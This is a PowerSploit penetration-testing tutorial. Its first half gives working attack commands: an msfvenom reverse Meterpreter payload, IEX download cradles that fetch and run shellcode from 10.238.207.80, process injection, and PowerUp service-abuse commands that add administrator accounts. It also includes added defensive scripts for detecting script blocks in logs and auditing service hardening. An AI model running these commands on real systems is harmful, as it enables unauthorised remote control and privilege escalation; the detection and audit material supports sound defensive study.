PowerSploit is a PowerShell-based post-exploitation framework that bundles many PowerShell attack scripts, used mainly for information reconnaissance, privilege escalation and persistence during a penetration test. GitHub: github.com/PowerShellMafia/PowerSploit
git clone https://github.com/PowerShellMafia/PowerSploit
Execute shellcode directly and get a reverse Meterpreter shell
Payload: windows/meterpreter/reverse_https
msfvenom -p windows/meterpreter/reverse_https LHOST=10.238.207.80 LPORT=4444 -f powershell -o /var/www/html/test
IEX(New-Object Net.WebClient).DownloadString("http://10.238.207.80/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://10.238.207.80/test")
Invoke-Shellcode -Shellcode($buf) -Force
Inject shellcode into a specified process and get a reverse Meterpreter shell
IEX(New-Object Net.WebClient).DownloadString("http://10.238.207.80/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://10.238.207.80/test")
Get-Process or ps (list processes to find the target process ID)
Start-Process C:\windows\system32\notepad.exe -WindowStyle Hidden
Invoke-Shellcode -ProcessID <process ID> -Shellcode($buf) -Force
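The two procedures above leave a distinctive trail in PowerShell Script Block Logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational): a WebClient download cradle fed into IEX, followed by Invoke-Shellcode, sometimes with a hidden host process. The following detection script is an added example written for this page; it is not part of PowerSploit or of the original notes. It assumes Script Block Logging is enabled on the host, that the ScriptBlockText is the third data field of event 4104, and uses constructed sample script blocks (the 192.0.2.10 address is a documentation address, not a real host) to show how it scores them.

```powershell
# Added detection example (not PowerSploit code): classify PowerShell Script Block
# Logging records (Microsoft-Windows-PowerShell/Operational, event ID 4104) by the
# patterns used in the notes: the WebClient download cradle, IEX, Invoke-Shellcode and
# a hidden host process. Script Block Logging must be enabled on the host
# (GPO: "Turn on PowerShell Script Block Logging") for the live query to return data.

$Indicators = [ordered]@{
    DownloadCradle   = 'New-Object\s+(System\.)?Net\.WebClient.*Download(String|File|Data)'
    InvokeExpression = '\b(IEX|Invoke-Expression)\b'
    InvokeShellcode  = 'Invoke-Shellcode'
    HiddenWindow     = 'Start-Process\b.*-WindowStyle\s+Hidden'
}

function Test-SuspiciousScriptBlock {
    # Returns the name of every indicator whose regex matches the script block text.
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    foreach ($name in $Indicators.Keys) {
        if ($ScriptBlockText -match $Indicators[$name]) { $name }
    }
}

function Get-ScriptBlockSeverity {
    # Single indicators are noisy (administrators do use WebClient); combinations are not.
    param([string[]]$Hits)
    if ($Hits -contains 'InvokeShellcode') { return 'Critical' }
    if ($Hits -contains 'DownloadCradle' -and $Hits -contains 'InvokeExpression') { return 'High' }
    if ($Hits.Count -gt 0) { return 'Low' }
    return 'None'
}

function Find-SuspiciousScriptBlock {
    # Live query of the local event log; ScriptBlockText is the third data field of 4104.
    param([int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            if (-not $text) { return }
            $hits = @(Test-SuspiciousScriptBlock -ScriptBlockText $text)
            if ($hits.Count -eq 0) { return }
            [PSCustomObject]@{
                TimeCreated = $_.TimeCreated
                Severity    = Get-ScriptBlockSeverity -Hits $hits
                Indicators  = $hits -join ','
                Snippet     = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
}

# Constructed sample script blocks (not real log data) showing how the classifier scores them.
$Samples = @(
    'IEX(New-Object Net.WebClient).DownloadString("http://192.0.2.10/Invoke-Shellcode.ps1")',
    'Invoke-Shellcode -ProcessID 1234 -Shellcode($buf) -Force',
    'Start-Process C:\windows\system32\notepad.exe -WindowStyle Hidden',
    'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5'
)
foreach ($s in $Samples) {
    $hits = @(Test-SuspiciousScriptBlock -ScriptBlockText $s)
    '{0,-9} {1,-32} {2}' -f (Get-ScriptBlockSeverity -Hits $hits), ($hits -join ','), $s
}

# On a host with Script Block Logging enabled, review live findings with:
# Find-SuspiciousScriptBlock | Sort-Object Severity | Format-Table -AutoSize
```

The sample run rates the cradle-plus-IEX line High, the Invoke-Shellcode line Critical, the hidden notepad launch Low and the benign Get-Process pipeline None; the severity rule is deliberately based on combinations so that an administrator's ordinary WebClient download does not page anyone on its own.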
PowerUp.ps1 is a script in the Privesc module; it contains many functions for finding exploitable Windows service weaknesses on the target host for privilege escalation.
Import-Module .\PowerUp.ps1
Command: Invoke-AllChecks
Command: Find-PathDllHijack
Command: Get-ApplicationHost
Get-ApplicationHost | Format-Table -AutoSize # display as a table
Command: Get-RegistryAlwaysInstallElevated
Command: Get-RegistryAutoLogon
Command: Get-ServiceDetail -ServiceName DHCP # get details of the DHCP service
Command: Get-ServiceFilePermission
Command: Test-ServiceDaclPermission
Command: Get-ServiceUnquoted
Command: Get-UnattendedInstallFile
Command: Get-ModifiableRegistryAutoRun
Command: Get-ModifiableScheduledTaskFile
Command: Get-Webconfig
Command: Invoke-ServiceAbuse -ServiceName VulnSVC # add the default account
Invoke-ServiceAbuse -ServiceName VulnSVC -UserName ".." # specify the domain account to add
Invoke-ServiceAbuse -ServiceName VulnSVC -UserName <user> -Password <password> -LocalGroup "Administrators" # add the specified user and password to the specified group
Invoke-ServiceAbuse -ServiceName VulnSVC -Command ".." # run a custom command
Command: Restore-ServiceBinary -ServiceName VulnSVC
Command: Test-ServiceDaclPermission -ServiceName VulnSVC
Command: Write-UserAddMSI
Command: Write-ServiceBinary -ServiceName VulnSVC # add the default account
Write-ServiceBinary -ServiceName VulnSVC -UserName ".." # specify the domain account to add
Write-ServiceBinary -ServiceName VulnSVC -UserName <user> -Password <password> # add the specified user and password to the specified group
Write-ServiceBinary -ServiceName VulnSVC -Command ".." # run a custom command
The difference is that the former generates an executable file, while the latter installs the service directly.
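The PowerUp checks listed above (Get-RegistryAlwaysInstallElevated, Get-ServiceUnquoted, Get-ServiceFilePermission) are the same conditions an administrator should audit for before an attacker does. The script below is an added hardening-audit example written for this page; it is not PowerUp code and not part of the original notes. It assumes it is run as an administrator on the host being audited, reads only the registry, the service list and file ACLs, changes nothing, and reports each finding with the fix to apply. The function names and the "Check/Object/Remediation" output shape are this example's own choices.

```powershell
# Added audit example (not PowerUp code): report the service and registry weaknesses
# that the PowerUp checks enumerate, each with the fix a defender would apply.
# Run as an administrator on the host being audited; read-only, changes nothing.

function Get-AlwaysInstallElevatedFinding {
    # Get-RegistryAlwaysInstallElevated: MSI packages run as SYSTEM only if BOTH the
    # machine and the user policy values are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $enabled = $true
    foreach ($k in $keys) {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if (-not $v -or $v.AlwaysInstallElevated -ne 1) { $enabled = $false }
    }
    if ($enabled) {
        [PSCustomObject]@{
            Check       = 'AlwaysInstallElevated'
            Object      = 'HKLM + HKCU Installer policy'
            Remediation = 'Disable "Always install with elevated privileges" in both policy keys'
        }
    }
}

function Test-UnquotedServicePath {
    # Get-ServiceUnquoted: an unquoted ImagePath with a space before the .exe makes the
    # service control manager try "C:\Program.exe", "C:\Program Files\Vendor.exe", ... first.
    param([string]$PathName)
    if (-not $PathName -or $PathName.StartsWith('"')) { return $false }
    if ($PathName -match '^(?<bin>.*?\.exe)') { return [bool]($Matches.bin -match '\s') }
    return $false
}

function Test-WritableByStandardUsers {
    # Get-ServiceFilePermission: an Allow ACE granting write rights to a low-privilege
    # principal lets a standard user replace the service binary.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (($ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Get-ServiceHardeningReport {
    # One finding object per weakness; empty output means none of the checks fired.
    Get-AlwaysInstallElevatedFinding
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (Test-UnquotedServicePath -PathName $svc.PathName) {
            [PSCustomObject]@{
                Check       = 'UnquotedServicePath'
                Object      = "$($svc.Name): $($svc.PathName)"
                Remediation = 'Wrap the binary path in double quotes in the service ImagePath'
            }
        }
        if ($svc.PathName -match '^"?(?<bin>.*?\.exe)' -and (Test-WritableByStandardUsers -Path $Matches.bin)) {
            [PSCustomObject]@{
                Check       = 'WritableServiceBinary'
                Object      = "$($svc.Name): $($Matches.bin)"
                Remediation = 'Remove write/modify rights for Users, Everyone and Authenticated Users from the binary'
            }
        }
    }
}

Get-ServiceHardeningReport | Format-Table -AutoSize -Wrap
```

The AlwaysInstallElevated check only reports when both policy values are set, because the Windows Installer honours the setting only in that case; the unquoted-path test looks at the portion of the ImagePath up to the first .exe, which is the part the service control manager splits on whitespace; and the ACL test is limited to the well-known low-privilege principals so that a binary writable only by Administrators or SYSTEM is not flagged.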